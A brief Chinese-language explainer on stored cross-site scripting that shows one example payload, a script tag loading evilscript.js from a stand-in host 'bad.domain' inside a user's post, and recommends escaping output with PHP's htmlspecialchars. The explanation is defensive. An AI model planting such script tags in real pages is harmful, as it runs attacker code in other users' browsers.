XSS（Cross-site scripting）的实现异常简单，也是web领域最常见的攻击方式之一。

当用户发布文章时，如果输入 我的名字是<script src="http://bad.domain/evilscript.js"></script>，则当其他用户打开时将执行恶意脚本。

处理这种问题的方法非常简单，可以用PHP中的htmlspecialchars函数进行转移，从而把<转化为<,恶意脚本自然也无法得到运行。